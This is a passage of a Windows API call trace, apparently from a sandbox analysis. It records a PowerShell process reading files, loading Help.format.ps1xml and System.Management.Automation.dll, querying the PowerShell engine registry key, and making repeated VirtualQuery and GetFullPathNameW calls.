	[0143.283] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.283] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.283] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.284] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.284] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.285] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.285] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.285] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.286] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.287] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0xf37, lpOverlapped=0x0) returned 1
	[0143.287] ReadFile (in: hFile=0x318, lpBuffer=0x3701adf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3701adf*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.287] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.287] CloseHandle (hObject=0x318) returned 1
	[0143.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.287] SetErrorMode (uMode=0x1) returned 0x1
	[0143.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0143.288] SetErrorMode (uMode=0x1) returned 0x1
	[0143.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x318) returned 0x0
	[0143.288] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0143.288] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ad950
	[0143.288] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7ad950, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0143.288] CoTaskMemFree (pv=0x1b7ad950) 
	[0143.288] RegCloseKey (hKey=0x318) returned 0x0
	[0143.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.302] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x2a47f885, Data2=0x5831, Data3=0x4150, Data4=([0]=0xb3, [1]=0xc8, [2]=0x95, [3]=0x76, [4]=0x27, [5]=0xd4, [6]=0xba, [7]=0x8c))) returned 0x0
	[0143.303] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x8ce90135, Data2=0xfef, Data3=0x4431, Data4=([0]=0xac, [1]=0xdb, [2]=0x54, [3]=0xed, [4]=0xaf, [5]=0x5c, [6]=0xd2, [7]=0x78))) returned 0x0
	[0143.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.574] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x5713d955, Data2=0xebca, Data3=0x4c14, Data4=([0]=0xb9, [1]=0x67, [2]=0xd1, [3]=0xd2, [4]=0xb7, [5]=0x96, [6]=0x72, [7]=0x17))) returned 0x0
	[0143.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.578] VirtualQuery (in: lpAddress=0x14b1e0, lpBuffer=0x14c0a0, dwLength=0x30 | out: lpBuffer=0x14c0a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.580] VirtualQuery (in: lpAddress=0x14b270, lpBuffer=0x14c130, dwLength=0x30 | out: lpBuffer=0x14c130*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.581] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.583] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.585] VirtualQuery (in: lpAddress=0x14b9f0, lpBuffer=0x14c8b0, dwLength=0x30 | out: lpBuffer=0x14c8b0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.586] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.586] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.587] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.587] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.587] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.587] VirtualQuery (in: lpAddress=0x14b950, lpBuffer=0x14c810, dwLength=0x30 | out: lpBuffer=0x14c810*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.587] VirtualQuery (in: lpAddress=0x14b9e0, lpBuffer=0x14c8a0, dwLength=0x30 | out: lpBuffer=0x14c8a0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
